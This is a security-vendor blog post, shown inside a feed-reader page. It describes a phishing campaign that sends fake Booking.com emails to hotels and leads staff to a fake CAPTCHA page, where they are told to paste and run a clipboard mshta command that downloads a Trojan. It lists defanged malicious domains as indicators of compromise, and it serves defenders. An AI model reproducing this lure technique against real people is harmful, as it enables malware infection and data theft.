惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Secure Thoughts
Security Latest
Security Latest
Simon Willison's Weblog
Simon Willison's Weblog
O
OpenAI News
GbyAI
GbyAI
L
LINUX DO - 最新话题
A
Arctic Wolf
T
Tor Project blog
G
GRAHAM CLULEY
I
InfoQ
博客园_首页
IT之家
IT之家
The Register - Security
The Register - Security
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
P
Proofpoint News Feed
The GitHub Blog
The GitHub Blog
Blog — PlanetScale
Blog — PlanetScale
N
Netflix TechBlog - Medium
K
Kaspersky official blog
博客园 - 三生石上(FineUI控件)
S
SegmentFault 最新的问题
U
Unit 42
PCI Perspectives
PCI Perspectives
量子位
P
Palo Alto Networks Blog
S
Securelist
T
Troy Hunt's Blog
博客园 - 【当耐特】
Recorded Future
Recorded Future
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
S
Security Affairs
Engineering at Meta
Engineering at Meta
T
The Blog of Author Tim Ferriss
博客园 - 聂微东
罗磊的独立博客
N
News and Events Feed by Topic
人人都是产品经理
人人都是产品经理
B
Blog RSS Feed
NISL@THU
NISL@THU
C
Cisco Blogs
T
Threatpost
有赞技术团队
有赞技术团队
Forbes - Security
Forbes - Security
Hugging Face - Blog
Hugging Face - Blog
Last Week in AI
Last Week in AI
T
The Exploit Database - CXSecurity.com
Cloudbric
Cloudbric
Cyberwarzone
Cyberwarzone
Google DeepMind News
Google DeepMind News
C
Cyber Attacks, Cyber Crime and Cyber Security

Threat Walkthroughs – ThreatDown by Malwarebytes

Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials USB worms: Still wriggling on to under-protected computers after all these years Analyzing a Mispadu Trojan’s attack chain How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes Web shop spreads SocGolish malware and steals credit cards Clipboard hijacker tries to install a Trojan A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
Fake Booking.com emails target hotels
Pieter Arntz · 2025-04-02 · via Threat Walkthroughs – ThreatDown by Malwarebytes
Booking.com

A new phishing campaign is using a famous brand to compromise hotels.

A new phishing campaign is using the Booking.com brand to target hotels, using fake Captcha websites. The attack begins with cybercriminals sending a fake Booking.com email to the hotel’s email address, asking them to confirm a booking.

Fake booking.com confirmation email

If the hotel staff go to the URL in the email, they are greeted by a website with a fake CAPTCHA popup asking them to prove they are a human.

Robot or Human?

Behind the scenes, the website has loaded a malicious mshta command into the user’s clipboard.

When they tick the CAPTCHA checkbox, the target is asked to complete a set of “Verification Steps”.

set of instructions

What the instructions actually do is paste the contents of the clipboard into a Windows command prompt and run it, which runs the mshta command that fetches and runs a remote file, setting off an attack chain that ends with the hotel’s systems being infected with a Trojan.

A compromised hotel network is a significant prize for cybercriminals, potentially offering access to payment details and other personal data that can be abused or sold.

How ThreatDown can help you

Even staff who have been trained to check that email senders are valid and that to avoid links in emails will slip up from time to time, and a range of technologies can blunt the impact when they do.

IOCs

Domains used in this campaign:

  • vencys[.]com, appears in the email and redirects to the CAPTCHA site.
  • bokcentrpart[.]com, hosts the fake CAPTCHA site.
  • captpart[.]info, the site the malware is downloaded from.